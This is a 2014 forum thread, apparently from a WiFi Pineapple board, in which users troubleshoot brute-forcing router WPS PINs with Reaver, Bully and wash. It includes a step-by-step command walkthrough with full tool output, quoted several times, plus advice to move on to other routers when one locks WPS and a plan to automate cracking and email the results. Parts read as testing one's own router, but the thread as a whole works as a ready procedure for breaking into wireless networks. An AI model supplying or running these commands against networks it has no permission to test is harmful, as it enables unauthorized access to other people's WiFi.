thesugarat Posted May 9, 2014 Share Posted May 9, 2014 What he said! Quote Link to comment Share on other sites More sharing options...
iluvethreeway Posted May 9, 2014 Share Posted May 9, 2014 If I am doing this , I got hat in log what i posted via Gyazo ! Its very slow and tries only 1 pin for a long time Quote Link to comment Share on other sites More sharing options...
thesugarat Posted May 9, 2014 Share Posted May 9, 2014 How close are you to the AP you are trying to crack? What is the measure for it using wash? wash -i mon0 Quote Link to comment Share on other sites More sharing options...
iluvethreeway Posted May 9, 2014 Share Posted May 9, 2014 if I use wash -i mon0 when wlan 1 is monitored, Nothing appears , its like not scanning when i use wash when wlan0 monitored , i get fcs packet errors Quote Link to comment Share on other sites More sharing options...
thesugarat Posted May 9, 2014 Share Posted May 9, 2014 I'd turn off any autostart functions and reboot your pineapple. Go to the Network Tile and the Client Mode Tab, click Disconnect if it's being used. SSH into the pineapple and down the interface ummm -- ifconfig wlan1 down -- then -- airmon-ng start wlan1 -- when the output of airmon-ng displays it may tell you running PIDS that can interfere with reaver, kill the ones that make sense. Don't UP the interface... Try wash at this point -- wash -i mon0 -- if wash isn't working for you here there is something else wrong and I'm not surprised that reaver isn't working either. I could have some of the commands or order wrong above as I'm doing this from memory at work. Quote Link to comment Share on other sites More sharing options...
iluvethreeway Posted May 10, 2014 Share Posted May 10, 2014 (edited) Thanks, Now it scans! btw, what does "ifconfig wlan1 down" do? WPS lock no or yes is good for me? version 1.0 edit: scan is extremely slow. is that normal? after started : wps log_1399720766.log [May 10 2014 11:40:49] [+] Waiting for beacon from 00:23:BE:30:4C:74 [+] Associated with 00:23:BE:30:4C:74 (ESSID: deef45) [+] 0.00% complete @ 2014-05-10 11:20:34 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:21:08 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:21:50 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:22:37 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:23:24 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:24:10 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:24:56 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:27:22 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:28:32 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:29:44 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:31:04 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:33:20 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:36:35 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:37:56 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:38:48 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:39:47 (0 seconds/pin) [+] 0.00% complete @ 2014-05-10 11:40:49 (0 seconds/pin) Edited May 10, 2014 by iluvethreeway Quote Link to comment Share on other sites More sharing options...
thesugarat Posted May 10, 2014 Share Posted May 10, 2014 It sets an interface to the down state and typically that is when you change settings like country code or TX power. Yes, the wash scan can take a while as it is collecting probes. WPS lock is bad. It means the router is smart enough to not allow Reaver to work. It is protecting itself. Move on to another router or plan for Reaver to take weeks + to get that pin. It can be set to try one pin after the router turns the lock off but each router is different so it'll take a while to figure it out. Quote Link to comment Share on other sites More sharing options...
GermanMeat Posted May 12, 2014 Share Posted May 12, 2014 (edited) Just got my pineapple, updated to 1.3 and installed a few infusions (including WPS). I've been having trouble within the WPS GUI (waits for beacons forever) so I dropped to console to start eliminating possibles and my trouble seems to be with something other than the GUI. I have a wifi router setup as my target with WPS enabled. First I down the interface (never works with it up and even through the GUI I have to manually down it). After I start with airmon-ng: airmon-ng start wlan0 Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 2936 root Process with PID root ( PID USER VSZ STAT COMMAND 1 root 1524 S init 2 root 0 SW [kthreadd] 3 root 0 SW [ksoftirqd/0] 5 root 0 SW [kworker/u:0] 6 root 0 SW< [khelper] 61 root 0 SW [sync_supers] 63 root 0 SW [bdi-default] 65 root 0 SW< [kblockd] 94 root 0 SW [kswapd0] 143 root 0 SW [fsnotify_mark] 155 root 0 SW< [ath79-spi] 166 root 0 SW [mtdblock0] 171 root 0 SW [mtdblock1] 176 root 0 SW [mtdblock2] 181 root 0 SW [mtdblock3] 186 root 0 SW [mtdblock4] 191 root 0 SW [mtdblock5] 232 root 0 SW [kworker/0:1] 422 root 0 SWN [jffs2_gcd_mtd3] 424 root 0 SW [flush-mtd-unmap] 448 root 0 SW [khubd] 459 root 0 SW [scsi_eh_0] 460 root 0 SW [usb-storage] 461 root 0 SW [kworker/0:2] 462 root 0 SW [kworker/u:2] 481 root 1524 S init 516 root 0 SW< [cfg80211] 558 root 0 SW< [rpciod] 568 root 0 SW< [nfsiod] 660 root 1528 S /sbin/syslogd -C16 662 root 1512 S /sbin/klogd 664 root 860 S /sbin/hotplug2 --override --persistent --set-rules-f 676 root 876 S /sbin/ubusd 745 root 1856 S {mobile-keepaliv} /bin/bash /etc/pineapple/mobile-ke 860 root 1488 S /sbin/netifd 1269 root 0 SW [jbd2/sda1-8] 1270 root 0 SW< [ext4-dio-unwrit] 1376 root 1520 S /sbin/watchdog -t 5 /dev/watchdog 1549 root 0 SW [flush-8:0] 1634 nobody 788 S /usr/sbin/atd 1642 root 1536 S /usr/sbin/crond -c /etc/crontabs -l 5 1648 root 2864 S /usr/sbin/sshd 1671 root 1136 S /usr/sbin/uhttpd -f -h /www -r Pineapple -x /cgi-bin 1677 root 1160 S /usr/sbin/uhttpd -f -h /pineapple -r Pineapple -c /e 1715 nobody 956 S /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf 1731 root 1520 S /usr/sbin/ntpd -n -p 0.openwrt.pool.ntp.org -p 1.ope 2936 root 1624 S wpa_supplicant -B -P /var/run/wifi-wlan1.pid -D nl80 2963 root 1528 S udhcpc -p /var/run/udhcpc-wlan1.pid -s /lib/netifd/d 3647 root 5488 S {sshd} sshd: root@pts/0 3660 root 1524 S -ash 3692 root 1508 S sleep 10 3702 root 1540 S {airmon-ng} /bin/sh /usr/sbin/airmon-ng start wlan0 3703 root 0 SW [kworker/u:1] 3743 root 1516 R ps -o comm= -p root) is running on interface wlan1 Process with PID root ( PID USER VSZ STAT COMMAND 1 root 1524 S init 2 root 0 SW [kthreadd] 3 root 0 SW [ksoftirqd/0] 5 root 0 SW [kworker/u:0] 6 root 0 SW< [khelper] 61 root 0 SW [sync_supers] 63 root 0 SW [bdi-default] 65 root 0 SW< [kblockd] 94 root 0 SW [kswapd0] 143 root 0 SW [fsnotify_mark] 155 root 0 SW< [ath79-spi] 166 root 0 SW [mtdblock0] 171 root 0 SW [mtdblock1] 176 root 0 SW [mtdblock2] 181 root 0 SW [mtdblock3] 186 root 0 SW [mtdblock4] 191 root 0 SW [mtdblock5] 232 root 0 SW [kworker/0:1] 422 root 0 SWN [jffs2_gcd_mtd3] 424 root 0 SW [flush-mtd-unmap] 448 root 0 SW [khubd] 459 root 0 SW [scsi_eh_0] 460 root 0 SW [usb-storage] 461 root 0 SW [kworker/0:2] 462 root 0 SW [kworker/u:2] 481 root 1524 S init 516 root 0 SW< [cfg80211] 558 root 0 SW< [rpciod] 568 root 0 SW< [nfsiod] 660 root 1528 S /sbin/syslogd -C16 662 root 1512 S /sbin/klogd 664 root 860 S /sbin/hotplug2 --override --persistent --set-rules-f 676 root 876 S /sbin/ubusd 745 root 1856 S {mobile-keepaliv} /bin/bash /etc/pineapple/mobile-ke 860 root 1488 S /sbin/netifd 1269 root 0 SW [jbd2/sda1-8] 1270 root 0 SW< [ext4-dio-unwrit] 1376 root 1520 S /sbin/watchdog -t 5 /dev/watchdog 1549 root 0 SW [flush-8:0] 1634 nobody 788 S /usr/sbin/atd 1642 root 1536 S /usr/sbin/crond -c /etc/crontabs -l 5 1648 root 2864 S /usr/sbin/sshd 1671 root 1136 S /usr/sbin/uhttpd -f -h /www -r Pineapple -x /cgi-bin 1677 root 1160 S /usr/sbin/uhttpd -f -h /pineapple -r Pineapple -c /e 1715 nobody 956 S /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf 1731 root 1520 S /usr/sbin/ntpd -n -p 0.openwrt.pool.ntp.org -p 1.ope 2936 root 1624 S wpa_supplicant -B -P /var/run/wifi-wlan1.pid -D nl80 2963 root 1528 S udhcpc -p /var/run/udhcpc-wlan1.pid -s /lib/netifd/d 3647 root 5488 S {sshd} sshd: root@pts/0 3660 root 1524 S -ash 3692 root 1508 S sleep 10 3702 root 1552 S {airmon-ng} /bin/sh /usr/sbin/airmon-ng start wlan0 3703 root 0 SW [kworker/u:1] 3744 root 1516 R ps -o comm= -p root) is running on interface wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] wlan0 Atheros ath9k - [phy0] (monitor mode enabled on mon0) Many other things seem to work on mon0. When I run reaver, its failing badly: root@Pineapple:~# reaver -i mon0 -b C0:C1:C0:8F:E0:91 -c 6 -vv Reaver v1.4 WiFi Protected Setup Attack Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Switching mon0 to channel 6 [+] Waiting for beacon from C0:C1:C0:8F:E0:91 [+] Associated with C0:C1:C0:8F:E0:91 (ESSID: SPickens) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response ^C [+] Nothing done, nothing to save. It will just do that forever if I'd let it. Sometimes, like 1 in 100, it will make it to M3/4 but still fails. The pineapple and the target router are separated by about 18-20 feet. I have no trouble with brute forcing this router with a crumby USB wifi stick and kali in a VMware session except the occasional dropping of the mon0 interface, but it shows no WPS transactions failing until it abruptly stops with the mon0 interface. I have yet to get a single successful WPS transaction... What am I missing? I have the exact same problem using Reaver. Pinapple V - latest firmware WPS Ver. 1.3 Reaver updated Bully updated Going into the WPS (ver 1.3) pineapple infusion, I start Wlan1 -put it into Monitor mode (Mon 0) , Select AP and select Mon 0 - Start but it still says waiting on beacon from (mac)... Just sits there..Refresh set at 5sec I noticed in the log file it always says Switching mon1 to channel 11 (I selected mon0 because that's the one is shows active when starting monitor mode.) Seem like it gets stuck with previous AP settings. Are there instructions somewhere? Bully doesn't seem to work for me either.. Edited May 12, 2014 by WilsonB Quote Link to comment Share on other sites More sharing options...
iluvethreeway Posted May 12, 2014 Share Posted May 12, 2014 Iam having exactly the same problem. Try wash -i mon0 to scan if there is any vulnerability Quote Link to comment Share on other sites More sharing options...
GermanMeat Posted May 12, 2014 Share Posted May 12, 2014 (edited) I can get to this point using reaver in WPS infusion, but it doesn't go any further; wps log_1399880666.log [May 12 2014 07:44:27] [+] Waiting for beacon from 30:xxxxxx [+] Associated with 30:xxxx (ESSID: xxxxx) and just stays here.. (xxxx intentional) Edited May 12, 2014 by WilsonB Quote Link to comment Share on other sites More sharing options...
thesugarat Posted May 12, 2014 Share Posted May 12, 2014 Guys, Forget the Infusion for right now.... Do everything via ssh. If you can't get it to work at the command line the Infusion certainly won't work. Use a Kali machine and an Alfa if you want... Just research/learn how it all works first. Then the Infusion just becomes the shortcut it really is. Quote Link to comment Share on other sites More sharing options...
SlimPickens Posted May 14, 2014 Share Posted May 14, 2014 (edited) The biggest help was starting at the command line. The trick is to make sure you're using wlan1 as your mon interface to start off with. I also primarily use the ethernet port to connect to it while its near by. Make sure that wlan0 (default Mk.V AP interface) isn't on the same channel as the target (change it if it is) or do like me and ifconfig it down if you're not using it. You won't have any luck with any remote AP on the same channel as wlan0 is on. I plan on adding a 5Ghz AP-capable USB stick in the near future so there is no more interference (or get my LTE stick working). Command line steps (from a fresh boot up): 1. Down the wlan1 interface: ifconfig wlan1 down Return: Nothing 2. Start the mon interface: airmon-ng start wlan1 root@Pineapple:~# airmon-ng start wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) wlan0 Atheros ath9k - [phy0] root@Pineapple:~# (If there is anything else than the above, everything you do afterwards will be flakey as all get out) 3. Look for your target router: wash -i mon0 -C I had to use -C or I'd just get bad FCS warnings and nothing else. The mon you should use is the one returned in the parentheses in the previous step "(monitor mode enabled on mon0)" root@Pineapple:~# wash -i mon0 -C Wash v1.4 WiFi Protected Setup Scan Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID -------------------------------------------------------------------------------------- 28:C6:8E:8C:90:F6 1 -73 1.0 No ####### E0:91:F5:75:CA:E2 1 -37 1.0 Yes ####### C0:C1:C0:BA:37:5F 1 -62 1.0 No ####### 7C:05:07:62:7C:C3 1 -68 1.0 No ####### C0:C1:C0:8F:E0:91 1 -66 1.0 No ####### C0:C1:C0:CC:B1:43 1 -57 1.0 No ####### 00:1C:DF:BE:43:47 6 -74 1.0 No ####### 00:1F:33:2E:D5:DE 9 -68 1.0 No ####### A0:21:B7:80:22:22 9 -71 1.0 No ####### 7C:05:07:29:EF:E7 11 -61 1.0 No ####### 00:22:75:D2:5C:7E 11 -67 1.0 No ####### 48:F8:B3:A3:15:31 11 -67 1.0 No ####### CC:B2:55:3C:F3:9C 11 -71 1.0 No ####### 0C:54:A5:54:84:6B 1 -71 1.0 No ####### ^C root@Pineapple:~# (my router is the one with the WPS Locked. I also put the ####### in there) Anything with a -65 or lower is going to be hard crack with lots of timeouts (remember these are negative numbers so -71 is lower than -65). The tiny included antennas are good for about 20-35 meters line of sight tops. 4. Get the MAC address you want and start reaver: reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 1 (-c is for channel, otherwise reaver(and bully) have to scan through each channel before starting. I'm impatient so I give it the clue) root@Pineapple:~# reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 11 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Switching mon0 to channel 11 [?] Restore previous session for E0:91:F5:75:CA:E2? [n/Y] [+] Restored previous session [+] Waiting for beacon from E0:91:F5:75:CA:E2 [+] Associated with E0:91:F5:75:CA:E2 (ESSID: #######) [+] Trying pin 33755670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 33765679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 33775678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message ^C [+] Session saved. root@Pineapple:~# 4b. Or bully: bully -b E0:91:F5:75:CA:E2 -c 1 -S mon0 5. Is up to you. You can do the same thing on the web interface. Just disable the wlan1 interface, enable monitor mode on wlan1, then use the infusion. Or continue to use the command line with "screen" to allow you to disconnect without quitting reaver. Edited May 14, 2014 by SlimPickens Quote Link to comment Share on other sites More sharing options...
GermanMeat Posted May 14, 2014 Share Posted May 14, 2014 (edited) The biggest help was starting at the command line. The trick is to make sure you're using wlan1 as your mon interface to start off with. I also primarily use the ethernet port to connect to it while its near by. Make sure that wlan0 (default Mk.V AP interface) isn't on the same channel as the target (change it if it is) or do like me and ifconfig it down if you're not using it. You won't have any luck with any remote AP on the same channel as wlan0 is on. I plan on adding a 5Ghz AP-capable USB stick in the near future so there is no more interference (or get my LTE stick working). Command line steps (from a fresh boot up): 1. Down the wlan1 interface: ifconfig wlan1 down Return: Nothing 2. Start the mon interface: airmon-ng start wlan1 root@Pineapple:~# airmon-ng start wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) wlan0 Atheros ath9k - [phy0] root@Pineapple:~# (If there is anything else than the above, everything you do afterwards will be flakey as all get out) 3. Look for your target router: wash -i mon0 -C I had to use -C or I'd just get bad FCS warnings and nothing else. The mon you should use is the one returned in the parentheses in the previous step "(monitor mode enabled on mon0)" root@Pineapple:~# wash -i mon0 -C Wash v1.4 WiFi Protected Setup Scan Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID -------------------------------------------------------------------------------------- 28:C6:8E:8C:90:F6 1 -73 1.0 No ####### E0:91:F5:75:CA:E2 1 -37 1.0 Yes ####### C0:C1:C0:BA:37:5F 1 -62 1.0 No ####### 7C:05:07:62:7C:C3 1 -68 1.0 No ####### C0:C1:C0:8F:E0:91 1 -66 1.0 No ####### C0:C1:C0:CC:B1:43 1 -57 1.0 No ####### 00:1C:DF:BE:43:47 6 -74 1.0 No ####### 00:1F:33:2E:D5:DE 9 -68 1.0 No ####### A0:21:B7:80:22:22 9 -71 1.0 No ####### 7C:05:07:29:EF:E7 11 -61 1.0 No ####### 00:22:75:D2:5C:7E 11 -67 1.0 No ####### 48:F8:B3:A3:15:31 11 -67 1.0 No ####### CC:B2:55:3C:F3:9C 11 -71 1.0 No ####### 0C:54:A5:54:84:6B 1 -71 1.0 No ####### ^C root@Pineapple:~# (my router is the one with the WPS Locked. I also put the ####### in there) Anything with a -65 or lower is going to be hard crack with lots of timeouts (remember these are negative numbers so -71 is lower than -65). The tiny included antennas are good for about 20-35 meters line of sight tops. 4. Get the MAC address you want and start reaver: reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 1 (-c is for channel, otherwise reaver(and bully) have to scan through each channel before starting. I'm impatient so I give it the clue) root@Pineapple:~# reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 11 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Switching mon0 to channel 11 [?] Restore previous session for E0:91:F5:75:CA:E2? [n/Y] [+] Restored previous session [+] Waiting for beacon from E0:91:F5:75:CA:E2 [+] Associated with E0:91:F5:75:CA:E2 (ESSID: #######) [+] Trying pin 33755670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 33765679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 33775678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message ^C [+] Session saved. root@Pineapple:~# 4b. Or bully: bully -b E0:91:F5:75:CA:E2 -c 1 -S mon0 5. Is up to you. You can do the same thing on the web interface. Just disable the wlan1 interface, enable monitor mode on wlan1, then use the infusion. Or continue to use the command line with "screen" to allow you to disconnect without quitting reaver. Man , thank you so much!! This was one of the best tutorials I have ever seen on this.. thanks I will prob. write an automated script to run, write file & email info and put it into one of the dip switches. I bought one of the gender changer for the antenna , so I can add a bigger one if wanted Edited May 14, 2014 by WilsonB Quote Link to comment Share on other sites More sharing options...
GermanMeat Posted May 14, 2014 Share Posted May 14, 2014 (edited) Honestly, I am now using wifite.py from command line and seems to work nicely.. less typing the better. Plan to SSH to it from my Note 3 when traveling Edited May 14, 2014 by WilsonB Quote Link to comment Share on other sites More sharing options...
thesugarat Posted May 15, 2014 Share Posted May 15, 2014 A good rundown. The -C when using wash is a great tip as is making sure your pineapples access point isn't using the same frequency. But honestly that last one I've never done. It's never been an issue that I know of. wifite.py is a great script but it doesn't crack WPS pins. Quote Link to comment Share on other sites More sharing options...
SlimPickens Posted May 15, 2014 Share Posted May 15, 2014 Honestly, I am now using wifite.py from command line and seems to work nicely.. less typing the better. Plan to SSH to it from my Note 3 when traveling Its always better to know the longhand first. You can work up from there no matter where you find yourself. ;) ..Only bad thing about that creed is there is always more longhand to learn. But man it is fun. Quote Link to comment Share on other sites More sharing options...
iluvethreeway Posted May 15, 2014 Share Posted May 15, 2014 [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 I am still having this issue ... Any ideas? Quote Link to comment Share on other sites More sharing options...
SlimPickens Posted May 15, 2014 Share Posted May 15, 2014 (edited) I think thats what I would get if the wlan0 AP interface was on the same channel as my target. Or maybe it was what I would get if I used wlan0 for the mon interface. Remember you want to use airmon-ng start wlan1 then use the mon interface it reports, if it reports more than one use airmon.ng stop monX like: airmon-ng stop mon0 until it reports only: Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] wlan0 Atheros ath9k - [phy0] Then airmon-ng start wlan1, and use mon0 for all "-i" with wash, reaver, and bully. Whats the signal strength reported by wash and what channel is wlan0 and your target on? Be sure that there aren't any more powerful APs on the same channel. When my main network AP is on channel 6, I have to switch it to something else before I can target any further away APs on that channel. Also there are cases that APs reported by wash just won't be attackable. But before you give up give bully a try. Edited May 15, 2014 by SlimPickens Quote Link to comment Share on other sites More sharing options...
iluvethreeway Posted May 15, 2014 Share Posted May 15, 2014 (edited) I have wlan0 enabled, wlan1 disabled and wlan2(alfa) monitored I tried to crack my, so the signal is 100% and the channel is 1. I tried another on channel 4, still the same EDIT: The main thing I dont understand those are the wlans enabled/disabled wlan0 should be enabled or disabled? wlan1 should be enabled or disabled? wlan2 ( thats my alfa) should be enabled or disabled? Only one should be enabled and the rest are disabled? or both 3 must be enabled? I dont get this Edited May 15, 2014 by iluvethreeway Quote Link to comment Share on other sites More sharing options...
GermanMeat Posted May 16, 2014 Share Posted May 16, 2014 The biggest help was starting at the command line. The trick is to make sure you're using wlan1 as your mon interface to start off with. I also primarily use the ethernet port to connect to it while its near by. Make sure that wlan0 (default Mk.V AP interface) isn't on the same channel as the target (change it if it is) or do like me and ifconfig it down if you're not using it. You won't have any luck with any remote AP on the same channel as wlan0 is on. I plan on adding a 5Ghz AP-capable USB stick in the near future so there is no more interference (or get my LTE stick working). Command line steps (from a fresh boot up): 1. Down the wlan1 interface: ifconfig wlan1 down Return: Nothing 2. Start the mon interface: airmon-ng start wlan1 root@Pineapple:~# airmon-ng start wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) wlan0 Atheros ath9k - [phy0] root@Pineapple:~# (If there is anything else than the above, everything you do afterwards will be flakey as all get out) 3. Look for your target router: wash -i mon0 -C I had to use -C or I'd just get bad FCS warnings and nothing else. The mon you should use is the one returned in the parentheses in the previous step "(monitor mode enabled on mon0)" root@Pineapple:~# wash -i mon0 -C Wash v1.4 WiFi Protected Setup Scan Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID -------------------------------------------------------------------------------------- 28:C6:8E:8C:90:F6 1 -73 1.0 No ####### E0:91:F5:75:CA:E2 1 -37 1.0 Yes ####### C0:C1:C0:BA:37:5F 1 -62 1.0 No ####### 7C:05:07:62:7C:C3 1 -68 1.0 No ####### C0:C1:C0:8F:E0:91 1 -66 1.0 No ####### C0:C1:C0:CC:B1:43 1 -57 1.0 No ####### 00:1C:DF:BE:43:47 6 -74 1.0 No ####### 00:1F:33:2E:D5:DE 9 -68 1.0 No ####### A0:21:B7:80:22:22 9 -71 1.0 No ####### 7C:05:07:29:EF:E7 11 -61 1.0 No ####### 00:22:75:D2:5C:7E 11 -67 1.0 No ####### 48:F8:B3:A3:15:31 11 -67 1.0 No ####### CC:B2:55:3C:F3:9C 11 -71 1.0 No ####### 0C:54:A5:54:84:6B 1 -71 1.0 No ####### ^C root@Pineapple:~# (my router is the one with the WPS Locked. I also put the ####### in there) Anything with a -65 or lower is going to be hard crack with lots of timeouts (remember these are negative numbers so -71 is lower than -65). The tiny included antennas are good for about 20-35 meters line of sight tops. 4. Get the MAC address you want and start reaver: reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 1 (-c is for channel, otherwise reaver(and bully) have to scan through each channel before starting. I'm impatient so I give it the clue) root@Pineapple:~# reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 11 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Switching mon0 to channel 11 [?] Restore previous session for E0:91:F5:75:CA:E2? [n/Y] [+] Restored previous session [+] Waiting for beacon from E0:91:F5:75:CA:E2 [+] Associated with E0:91:F5:75:CA:E2 (ESSID: #######) [+] Trying pin 33755670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 33765679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 33775678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message ^C [+] Session saved. root@Pineapple:~# 4b. Or bully: bully -b E0:91:F5:75:CA:E2 -c 1 -S mon0 5. Is up to you. You can do the same thing on the web interface. Just disable the wlan1 interface, enable monitor mode on wlan1, then use the infusion. Or continue to use the command line with "screen" to allow you to disconnect without quitting reaver. After doing; airmon-ng start wlan1 I get ; Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! and lists a long list of pid processes. Also, n00b question. How do I reset the mon. Meaning if I ran it 2X or more.. I want to kill all mon on Wlan1 and be able to run wlan start again and it goes to mon0 Thanks Quote Link to comment Share on other sites More sharing options...
thesugarat Posted May 16, 2014 Share Posted May 16, 2014 (edited) airmon-ng stop wlan1 Or reboot if you're lazy. :) Edited May 16, 2014 by thesugarat Quote Link to comment Share on other sites More sharing options...
SlimPickens Posted May 16, 2014 Share Posted May 16, 2014 (edited) You want the interface you are using to crack to be down. "Down" in ifconfig does not mean the hardware is disabled. The hardware is still there as wlan2, its just not running as an interface for that part of the OS. The reason you do this is so that no other part of the OS is trying to use it while you are using it for cracking. Thats why airmon-ng warns you about all those pids, one of them could interrupt your cracking by changing the settings or conditions of the hardware behind reaver. So if you want to use wlan2 for cracking, you want to: ifconfig wlan2 down airmon-ng start wlan2 (look for what mon interface number to use in the response) reaver -i *that_mon_interface_from_airmon-ng's_return* -b *mac* -vv -c *channel* But I'd start with wlan1, make sure that you have the hang of things, then move on to other hardware. You can check your work by running just ifconfig and looking at the interfaces. root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1127 errors:0 dropped:0 overruns:0 frame:0 TX packets:24175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:86006 (83.9 KiB) TX bytes:1082632 (1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1130 errors:0 dropped:0 overruns:0 frame:0 TX packets:24178 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:102810 (100.4 KiB) TX bytes:1083838 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32058 errors:0 dropped:0 overruns:0 frame:0 TX packets:32058 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2481231 (2.3 MiB) TX bytes:2481231 (2.3 MiB) wlan1 Link encap:Ethernet HWaddr 00:13:37:93:58:09 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) See wlan1 is listed? Note the MAC address. 00:13:37:93:58:09 now after ifconfig wlan1 down: root@Pineapple:~# ifconfig wlan1 down root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1191 errors:0 dropped:0 overruns:0 frame:0 TX packets:24254 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:90726 (88.5 KiB) TX bytes:1089990 